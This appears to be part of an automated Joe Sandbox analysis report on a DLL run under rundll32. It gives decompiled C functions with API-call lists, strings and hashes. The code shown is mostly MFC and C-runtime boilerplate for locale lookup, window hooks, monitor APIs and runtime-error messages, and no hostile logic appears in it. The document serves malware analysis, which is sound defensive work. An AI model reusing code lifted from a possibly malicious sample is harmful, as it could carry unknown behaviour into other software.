                                                                        							_t105 = 1;
                                                                        							_t99 = 0;
                                                                        							if(1 <= _t85) {
                                                                        								L16:
                                                                        								_t47 = 0;
                                                                        								L17:
                                                                        								return E100117AE(_t47, _v8);
                                                                        							} else {
                                                                        								goto L14;
                                                                        							}
                                                                        							while(1) {
                                                                        								L14:
                                                                        								_t47 = E100348C4(_t85, _t88, _t105, _a4,  *((intOrPtr*)(_t109 + _t99 * 4 - 0x3c)));
                                                                        								_pop(_t88);
                                                                        								if(_t47 != _t85) {
                                                                        									goto L17;
                                                                        								}
                                                                        								_t99 =  &(1[_t99]);
                                                                        								if(_t99 < _t105) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L16;
                                                                        							}
                                                                        							goto L17;
                                                                        						}
                                                                        						_t88 =  &_v28;
                                                                        						_v28 = 0;
                                                                        						EnumResourceLanguagesA(_t46, 0x10, 1, 0x10034943,  &_v28);
                                                                        						if(_v28 == 0) {
                                                                        							goto L13;
                                                                        						}
                                                                        						_t50 = _v28 & 0x0000ffff;
                                                                        						_t88 = _t50 & 0x000003ff;
                                                                        						_t100 = _t50 & 0x3ff;
                                                                        						_v64 = ConvertDefaultLocale(_t50 & 0x0000fc00 | _t100);
                                                                        						_v60 = ConvertDefaultLocale(_t100);
                                                                        						_push(2);
                                                                        						L12:
                                                                        						_pop(0);
                                                                        						goto L13;
                                                                        					}
                                                                        					_v32 = 0;
                                                                        					if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v32) == 0) {
                                                                        						_v36 = 0x10;
                                                                        						if(RegQueryValueExA(_v32, 0, 0,  &_v40,  &_v24,  &_v36) == 0 && _v40 == 1 && E10011D9B(0, GetModuleHandleA, 0,  &_v24, "%x",  &_v44) == 1) {
                                                                        							_t65 = _v44;
                                                                        							_v28 = _t65;
                                                                        							_t66 = _t65 & 0x0000ffff;
                                                                        							_t88 = _t66 & 0x000003ff;
                                                                        							_t101 = _t66 & 0x3ff;
                                                                        							_v64 = ConvertDefaultLocale(_t66 & 0x0000fc00 | _t101);
                                                                        							_t70 = ConvertDefaultLocale(_t101);
                                                                        							_push(2);
                                                                        							_v60 = _t70;
                                                                        							_pop(0);
                                                                        						}
                                                                        						RegCloseKey(_v32);
                                                                        					}
                                                                        					goto L13;
                                                                        				}
                                                                        				_t71 =  *_t44();
                                                                        				_v28 = _t71;
                                                                        				_t72 = _t71 & 0x0000ffff;
                                                                        				_t95 = _t72 & 0x3ff;
                                                                        				_v32 = _t95;
                                                                        				_v64 = ConvertDefaultLocale(_t72 & 0x0000fc00 | _t95);
                                                                        				_v60 = ConvertDefaultLocale(_v32);
                                                                        				_t78 =  *(GetProcAddress(_v36, "GetSystemDefaultUILanguage"))();
                                                                        				_v28 = _t78;
                                                                        				_t79 = _t78 & 0x0000ffff;
                                                                        				_t88 = _t79 & 0x000003ff;
                                                                        				_t87 = _t79 & 0x3ff;
                                                                        				_v56 = ConvertDefaultLocale(_t79 & 0x0000fc00 | _t87);
                                                                        				_v52 = ConvertDefaultLocale(_t87);
                                                                        				_push(4);
                                                                        				_t85 = 0;
                                                                        				goto L12;
                                                                        			}

                                                                        0x100349a6
                                                                        0x100349ad
                                                                        0x100349b5
                                                                        0x100349bd
                                                                        0x100349ca
                                                                        0x100349d3
                                                                        0x100349d5
                                                                        0x100349d8
                                                                        0x100349dd
                                                                        0x100349df
                                                                        0x100349ea
                                                                        0x100349ef
                                                                        0x100349f2
                                                                        0x100349f4
                                                                        0x00000000

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                        • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                        • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                        • GetVersion.KERNEL32 ref: 100349FB
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10034A20
                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10034A46
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 10034A92
                                                                        • ConvertDefaultLocale.KERNEL32(76D84DE0), ref: 10034A98
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10034AA3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                        • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                        • API String ID: 780041395-483790700
                                                                        • Opcode ID: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                        • Instruction ID: 7cfe531e2014ce0a7197dcc2f573d90a24e44201c953dd79459b2257b218328e
                                                                        • Opcode Fuzzy Hash: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                        • Instruction Fuzzy Hash: 00515F75D0022DAFDB12DFE6DC85AEFBBF8EB48355F11442AE501EB140DB7899409BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E100235CF(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
                                                                        				intOrPtr _v8;
                                                                        				char _v16;
                                                                        				char _v17;
                                                                        				char _v272;
                                                                        				struct _WNDCLASSEXA _v320;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t52;
                                                                        				signed int _t56;
                                                                        				char _t58;
                                                                        				long _t60;
                                                                        				int _t71;
                                                                        				long _t81;
                                                                        				CHAR* _t83;
                                                                        				void* _t90;
                                                                        				void* _t99;
                                                                        				long* _t102;
                                                                        				signed int _t104;
                                                                        				long _t105;
                                                                        				CHAR* _t107;
                                                                        				int _t108;
                                                                        
                                                                        				_t52 =  *0x1004c470; // 0x1bfbe703
                                                                        				_push(0x100347fd);
                                                                        				_v8 = _t52;
                                                                        				_t90 = E10037855(0x1004efe8);
                                                                        				if(_a4 == 3) {
                                                                        					_t104 =  *(_t90 + 0x14);
                                                                        					_push(__edi);
                                                                        					_t99 =  *_a12;
                                                                        					_t56 =  *(E100373B5() + 0x14) & 0x000000ff;
                                                                        					_a4 = _t56;
                                                                        					if(_t104 != 0 || ( *(_t99 + 0x23) & 0x00000040) == 0 && _t56 == 0) {
                                                                        						if( *0x1004f354 == 0) {
                                                                        							L10:
                                                                        							if(_t104 == 0) {
                                                                        								if( *0x1004ef68 != 0) {
                                                                        									L16:
                                                                        									if(GetClassLongA(_a8, 0xffffffe0) !=  *0x1004ef68) {
                                                                        										L20:
                                                                        										_t58 = GetWindowLongA(_a8, 0xfffffffc);
                                                                        										_v16 = _t58;
                                                                        										if(_t58 != 0) {
                                                                        											_t107 = "AfxOldWndProc423";
                                                                        											if(GetPropA(_a8, _t107) == 0) {
                                                                        												SetPropA(_a8, _t107, _v16);
                                                                        												if(GetPropA(_a8, _t107) == _v16) {
                                                                        													GlobalAddAtomA(_t107);
                                                                        													SetWindowLongA(_a8, 0xfffffffc, 0x10023477);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        										goto L24;
                                                                        									}
                                                                        									goto L24;
                                                                        								}
                                                                        								_t108 = 0x30;
                                                                        								E10011C50( &_v320, 0, _t108);
                                                                        								_v320.cbSize = _t108;
                                                                        								_t71 = GetClassInfoExA(0, "#32768",  &_v320);
                                                                        								 *0x1004ef68 = _t71;
                                                                        								if(_t71 == 0) {
                                                                        									if(GetClassNameA(_a8,  &_v272, 0x100) == 0) {
                                                                        										goto L20;
                                                                        									}
                                                                        									_v17 = 0;
                                                                        									if(E10011CB0(_t90, _t99,  &_v272, "#32768") == 0) {
                                                                        										goto L24;
                                                                        									}
                                                                        									goto L20;
                                                                        								}
                                                                        								goto L16;
                                                                        							}
                                                                        							E1002212F(_t104, _a8);
                                                                        							 *((intOrPtr*)( *_t104 + 0x50))();
                                                                        							_t102 =  *((intOrPtr*)( *_t104 + 0xf0))();
                                                                        							_t81 = SetWindowLongA(_a8, 0xfffffffc, E1002292C);
                                                                        							if(_t81 != E1002292C) {
                                                                        								 *_t102 = _t81;
                                                                        							}
                                                                        							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x00000000;
                                                                        							goto L24;
                                                                        						}
                                                                        						if((GetClassLongA(_a8, 0xffffffe6) & 0x00010000) != 0) {
                                                                        							goto L24;
                                                                        						}
                                                                        						_t83 =  *(_t99 + 0x28);
                                                                        						if(_t83 <= 0xffff) {
                                                                        							_v16 = 0;
                                                                        							GlobalGetAtomNameA(0,  &_v16, 5);
                                                                        							_t83 =  &_v16;
                                                                        						}
                                                                        						if(lstrcmpiA(_t83, "ime") == 0) {
                                                                        							goto L24;
                                                                        						}
                                                                        						goto L10;
                                                                        					} else {
                                                                        						L24:
                                                                        						_t105 = CallNextHookEx( *(_t90 + 0x28), 3, _a8, _a12);
                                                                        						if(_a4 != 0) {
                                                                        							UnhookWindowsHookEx( *(_t90 + 0x28));
                                                                        							 *(_t90 + 0x28) =  *(_t90 + 0x28) & 0x00000000;
                                                                        						}
                                                                        						_t60 = _t105;
                                                                        						goto L27;
                                                                        					}
                                                                        				} else {
                                                                        					_t60 = CallNextHookEx( *(_t90 + 0x28), _a4, _a8, _a12);
                                                                        					L27:
                                                                        					return E100117AE(_t60, _v8);
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                          • Part of subcall function 10037855: __EH_prolog.LIBCMT ref: 1003785A
                                                                        • CallNextHookEx.USER32 ref: 10023604
                                                                        • GetClassLongA.USER32 ref: 10023649
                                                                        • GlobalGetAtomNameA.KERNEL32 ref: 10023675
                                                                        • lstrcmpiA.KERNEL32(?,ime,?,?,100347FD), ref: 10023684
                                                                        • SetWindowLongA.USER32(?,000000FC,Function_0002292C), ref: 100236BE
                                                                        • CallNextHookEx.USER32 ref: 100237C2
                                                                        • UnhookWindowsHookEx.USER32(?), ref: 100237D3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                                                        • String ID: #32768$AfxOldWndProc423$ime
                                                                        • API String ID: 3204395069-4034971020
                                                                        • Opcode ID: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                        • Instruction ID: 9db2fd6ca1a0fe5cf1724ce820e3dc2bd2b139ec8c0118dd51308d1b35c9be8a
                                                                        • Opcode Fuzzy Hash: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                        • Instruction Fuzzy Hash: 1051AB75504269BFDF12DF61EC88FAA7BB9EF053A0F618164F814EA1A1C730DA44CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E1000799F() {
                                                                        				void* __edi;
                                                                        				intOrPtr _t5;
                                                                        				_Unknown_base(*)()* _t6;
                                                                        				_Unknown_base(*)()* _t7;
                                                                        				_Unknown_base(*)()* _t8;
                                                                        				_Unknown_base(*)()* _t9;
                                                                        				_Unknown_base(*)()* _t10;
                                                                        				_Unknown_base(*)()* _t11;
                                                                        				_Unknown_base(*)()* _t12;
                                                                        				void* _t17;
                                                                        				struct HINSTANCE__* _t18;
                                                                        				intOrPtr _t23;
                                                                        				_Unknown_base(*)()* _t24;
                                                                        
                                                                        				_t23 =  *0x1004ee14; // 0x0
                                                                        				if(_t23 == 0) {
                                                                        					_push(_t17);
                                                                        					 *0x1004ee18 = E10007952(_t17);
                                                                        					_t18 = GetModuleHandleA("USER32");
                                                                        					if(_t18 == 0) {
                                                                        						L11:
                                                                        						 *0x1004edf8 = 0;
                                                                        						 *0x1004edfc = 0;
                                                                        						 *0x1004ee00 = 0;
                                                                        						 *0x1004ee04 = 0;
                                                                        						 *0x1004ee08 = 0;
                                                                        						 *0x1004ee0c = 0;
                                                                        						 *0x1004ee10 = 0;
                                                                        						 *0x1004ee14 = 1;
                                                                        						_t5 = 0;
                                                                        					} else {
                                                                        						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                        						 *0x1004edf8 = _t6;
                                                                        						if(_t6 == 0) {
                                                                        							goto L11;
                                                                        						} else {
                                                                        							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                        							 *0x1004edfc = _t7;
                                                                        							if(_t7 == 0) {
                                                                        								goto L11;
                                                                        							} else {
                                                                        								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                        								 *0x1004ee00 = _t8;
                                                                        								if(_t8 == 0) {
                                                                        									goto L11;
                                                                        								} else {
                                                                        									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                        									 *0x1004ee04 = _t9;
                                                                        									if(_t9 == 0) {
                                                                        										goto L11;
                                                                        									} else {
                                                                        										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                        										 *0x1004ee0c = _t10;
                                                                        										if(_t10 == 0) {
                                                                        											goto L11;
                                                                        										} else {
                                                                        											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                        											 *0x1004ee08 = _t11;
                                                                        											if(_t11 == 0) {
                                                                        												goto L11;
                                                                        											} else {
                                                                        												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                        												 *0x1004ee10 = _t12;
                                                                        												if(_t12 == 0) {
                                                                        													goto L11;
                                                                        												} else {
                                                                        													_t5 = 1;
                                                                        													 *0x1004ee14 = 1;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return _t5;
                                                                        				} else {
                                                                        					_t24 =  *0x1004ee08; // 0x0
                                                                        					return 0 | _t24 != 0x00000000;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(USER32,?,?,?,10007AF0), ref: 100079C8
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100079E4
                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100079F5
                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10007A06
                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10007A17
                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10007A28
                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10007A39
                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10007A4A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                        • API String ID: 667068680-68207542
                                                                        • Opcode ID: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                        • Instruction ID: ffa68e8141f0c788966a5bf5f1ab221f1da63df34d474a4f7eb5d2f911dd9ebc
                                                                        • Opcode Fuzzy Hash: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                        • Instruction Fuzzy Hash: 05214F71E055B19EF702EF678EC482EBAE5F38B381351483FD109D6125C7B44D518B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E10016994() {
                                                                        				intOrPtr _t20;
                                                                        				int _t21;
                                                                        				long _t24;
                                                                        				void* _t31;
                                                                        				void* _t51;
                                                                        				long _t52;
                                                                        				void* _t57;
                                                                        				signed int _t67;
                                                                        				void** _t69;
                                                                        				void* _t70;
                                                                        				void* _t72;
                                                                        				void* _t73;
                                                                        
                                                                        				_t70 = _t72 - 0x8c;
                                                                        				_t73 = _t72 - 0x10c;
                                                                        				_t20 =  *0x1004c470; // 0x1bfbe703
                                                                        				_t52 =  *(_t70 + 0x94);
                                                                        				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
                                                                        				_t21 = 0;
                                                                        				while(_t52 !=  *((intOrPtr*)(0x1004cb88 + _t21 * 8))) {
                                                                        					_t21 = _t21 + 1;
                                                                        					if(_t21 < 0x13) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				_t67 = _t21 << 3;
                                                                        				_t6 = _t67 + 0x1004cb88; // 0x28000000
                                                                        				if(_t52 ==  *_t6) {
                                                                        					_t21 =  *0x1004f3d4; // 0x0
                                                                        					if(_t21 == 1 || _t21 == 0 &&  *0x1004f3d8 == 1) {
                                                                        						_t17 = _t67 + 0x1004cb8c; // 0x10042328
                                                                        						_t69 = _t17;
                                                                        						_t24 = E10011820( *_t69);
                                                                        						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
                                                                        					} else {
                                                                        						if(_t52 != 0xfc) {
                                                                        							 *((char*)(_t70 + 0x84)) = 0;
                                                                        							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
                                                                        								E10017B90(_t70 - 0x80, "<program name unknown>");
                                                                        							}
                                                                        							_t63 = _t70 - 0x80;
                                                                        							if(E10011820(_t70 - 0x80) + 1 > 0x3c) {
                                                                        								E10019E20(E10011820(_t63) + _t70 - 0x45, "...", 3);
                                                                        								_t73 = _t73 + 0x10;
                                                                        							}
                                                                        							_t31 = E10011820(_t63);
                                                                        							_t12 = _t67 + 0x1004cb8c; // 0x10042328
                                                                        							_t14 = E10011820( *_t12) + 0x1c; // 0x1c
                                                                        							_pop(_t57);
                                                                        							E10010B20(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
                                                                        							_t51 = _t73;
                                                                        							E10017B90(_t51, "Runtime Error!\n\nProgram: ");
                                                                        							E10017BA0(_t51, _t63);
                                                                        							E10017BA0(_t51, "\n\n");
                                                                        							_t15 = _t67 + 0x1004cb8c; // 0x10042328
                                                                        							E10017BA0(_t51,  *_t15);
                                                                        							_push(0x12010);
                                                                        							_push("Microsoft Visual C++ Runtime Library");
                                                                        							_push(_t51);
                                                                        							_t21 = E10019D1D();
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E100117AE(_t21,  *((intOrPtr*)(_t70 + 0x88)));
                                                                        			}
















                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 10016A15
                                                                        • _strcat.LIBCMT ref: 10016A28
                                                                        • _strlen.LIBCMT ref: 10016A35
                                                                        • _strlen.LIBCMT ref: 10016A44
                                                                        • _strncpy.LIBCMT ref: 10016A5B
                                                                        • _strlen.LIBCMT ref: 10016A64
                                                                        • _strlen.LIBCMT ref: 10016A71
                                                                        • _strcat.LIBCMT ref: 10016A8F
                                                                        • _strlen.LIBCMT ref: 10016AD7
                                                                        • GetStdHandle.KERNEL32(000000F4,10042328,00000000,?,00000000,00000000,00000000,00000000), ref: 10016AE2
                                                                        • WriteFile.KERNEL32(00000000), ref: 10016AE9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                        • API String ID: 3601721357-4022980321
                                                                        • Opcode ID: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                        • Instruction ID: a98b9a16bc0a3033c6b9ef3d9cc886c10ccef6c9644ec2f046cd71b0d49ba214
                                                                        • Opcode Fuzzy Hash: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                        • Instruction Fuzzy Hash: 6331F4765002146BEB21EB74CCD6EAA37BDEF48250F10891AF545EB142EF34F9C98B64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E10024FBB(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4) {
                                                                        				signed int _v8;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				char _v32;
                                                                        				char _v268;
                                                                        				char _v292;
                                                                        				char _v296;
                                                                        				signed int _v300;
                                                                        				CHAR* _v304;
                                                                        				intOrPtr _v308;
                                                                        				char _v312;
                                                                        				char _v316;
                                                                        				void* __ebp;
                                                                        				signed int _t102;
                                                                        				intOrPtr _t106;
                                                                        				signed int _t108;
                                                                        				signed int _t110;
                                                                        				int* _t118;
                                                                        				signed int _t125;
                                                                        				signed int _t128;
                                                                        				signed int _t132;
                                                                        				void* _t136;
                                                                        				intOrPtr* _t138;
                                                                        				void* _t170;
                                                                        				intOrPtr* _t171;
                                                                        				void* _t173;
                                                                        				int _t175;
                                                                        				intOrPtr _t176;
                                                                        				signed int _t177;
                                                                        				intOrPtr _t180;
                                                                        				intOrPtr* _t181;
                                                                        				signed int _t182;
                                                                        				intOrPtr _t183;
                                                                        				signed char _t196;
                                                                        				signed char _t197;
                                                                        				signed int _t217;
                                                                        				intOrPtr* _t219;
                                                                        				intOrPtr* _t220;
                                                                        				void* _t223;
                                                                        				intOrPtr* _t224;
                                                                        				signed int _t226;
                                                                        				void* _t228;
                                                                        				void* _t229;
                                                                        				void* _t230;
                                                                        
                                                                        				_t223 = __esi;
                                                                        				_t181 = __ecx;
                                                                        				_t170 = __ebx;
                                                                        				_t102 =  *0x1004c470; // 0x1bfbe703
                                                                        				_push(__esi);
                                                                        				_push(__edi);
                                                                        				_v8 = _t102;
                                                                        				_t219 = __ecx;
                                                                        				if(_a4 == 0 || lstrlenA(_a4) >= 0x104) {
                                                                        					L10:
                                                                        					_push(0);
                                                                        					_push(0xffffffff);
                                                                        					_push(3);
                                                                        					E10027180(_t181);
                                                                        					asm("int3");
                                                                        					E10011BF0(0x1003ab29, _t228);
                                                                        					_t230 = _t229 - 0x12c;
                                                                        					_t106 =  *0x1004c470; // 0x1bfbe703
                                                                        					_push(_t170);
                                                                        					_push(_t223);
                                                                        					_t224 = _a4;
                                                                        					_push(_t219);
                                                                        					_t220 = _t181;
                                                                        					_t182 =  *(_t224 + 0xc);
                                                                        					_v20 = _t106;
                                                                        					_t171 = _t220 + 0x1c;
                                                                        					_t108 =  *( *_t171 - 0xc);
                                                                        					__eflags = _t108;
                                                                        					if(_t108 == 0) {
                                                                        						__eflags = _t182;
                                                                        						if(_t182 != 0) {
                                                                        							E10026397(_t182,  *(_t224 + 4), _t171, _t108);
                                                                        						}
                                                                        					}
                                                                        					_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t220 + 8))));
                                                                        					_t110 = 0;
                                                                        					__eflags =  *(_t183 - 0xc);
                                                                        					if( *(_t183 - 0xc) != 0) {
                                                                        						__eflags =  *(_t224 + 0xc);
                                                                        						if( *(_t224 + 0xc) != 0) {
                                                                        							_t173 = 0;
                                                                        							__eflags =  *(_t220 + 4);
                                                                        							if( *(_t220 + 4) > 0) {
                                                                        								do {
                                                                        									DeleteMenu( *( *(_t224 + 0xc) + 4),  *(_t224 + 4) + _t173, 0);
                                                                        									_t173 = _t173 + 1;
                                                                        									__eflags = _t173 -  *(_t220 + 4);
                                                                        								} while (_t173 <  *(_t220 + 4));
                                                                        							}
                                                                        							_t110 = GetCurrentDirectoryA(0x104,  &_v292);
                                                                        							__eflags = _t110;
                                                                        							if(_t110 != 0) {
                                                                        								__eflags = _t110 - 0x104;
                                                                        								if(_t110 < 0x104) {
                                                                        									_t175 = lstrlenA( &_v292);
                                                                        									 *((char*)(_t228 + _t175 - 0x120)) = 0x5c;
                                                                        									_t176 = _t175 + 1;
                                                                        									_v308 = _t176;
                                                                        									 *((char*)(_t228 + _t176 - 0x120)) = 0;
                                                                        									_v300 =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
                                                                        									_v8 = _v8 & 0x00000000;
                                                                        									_t118 = E100243B2();
                                                                        									_t216 =  *_t118;
                                                                        									_v296 =  *((intOrPtr*)( *_t118 + 0xc))() + 0x10;
                                                                        									_a4 = _a4 & 0x00000000;
                                                                        									__eflags =  *(_t220 + 4);
                                                                        									_v8 = 1;
                                                                        									if( *(_t220 + 4) > 0) {
                                                                        										while(1) {
                                                                        											_t125 =  *((intOrPtr*)( *_t220 + 8))( &_v300, _a4,  &_v292, _t176, 1);
                                                                        											__eflags = _t125;
                                                                        											if(_t125 == 0) {
                                                                        												goto L40;
                                                                        											}
                                                                        											_t177 = _v300;
                                                                        											_t128 = E100017D0( &_v296,  *((intOrPtr*)(_t177 - 0xc)) +  *((intOrPtr*)(_t177 - 0xc)));
                                                                        											while(1) {
                                                                        												_t196 =  *_t177;
                                                                        												__eflags = _t196;
                                                                        												if(_t196 == 0) {
                                                                        													break;
                                                                        												}
                                                                        												__eflags = _t196 - 0x26;
                                                                        												if(_t196 == 0x26) {
                                                                        													 *_t128 = _t196;
                                                                        													_t128 = _t128 + 1;
                                                                        													__eflags = _t128;
                                                                        												}
                                                                        												_t197 =  *_t177;
                                                                        												_t217 = _t197 & 0x000000ff;
                                                                        												__eflags =  *(_t217 + 0x10050a81) & 0x00000004;
                                                                        												if(( *(_t217 + 0x10050a81) & 0x00000004) != 0) {
                                                                        													 *_t128 = _t197;
                                                                        													_t128 = _t128 + 1;
                                                                        													_t177 = _t177 + 1;
                                                                        													__eflags = _t177;
                                                                        												}
                                                                        												 *_t128 =  *_t177;
                                                                        												_t128 = _t128 + 1;
                                                                        												_t177 = _t177 + 1;
                                                                        												__eflags = _t177;
                                                                        											}
                                                                        											 *_t128 = _t196;
                                                                        											E10006CE2(_t177,  &_v296, _t220, 0xffffffff);
                                                                        											_t132 =  *((intOrPtr*)(_t220 + 0x14)) + _a4 + 0x00000001 & 0x0000000f;
                                                                        											__eflags = _t132 - 0xa;
                                                                        											if(__eflags <= 0) {
                                                                        												if(__eflags != 0) {
                                                                        													wsprintfA( &_v32, ??, "&%d ", _t132);
                                                                        													goto L38;
                                                                        												} else {
                                                                        													lstrcpyA( &_v32, "1&0 ");
                                                                        												}
                                                                        											} else {
                                                                        												wsprintfA( &_v32, ??, "%d ", _t132);
                                                                        												L38:
                                                                        												_t230 = _t230 + 0xc;
                                                                        											}
                                                                        											_push( &_v32);
                                                                        											_t136 = E10006B11( &_v312, __eflags);
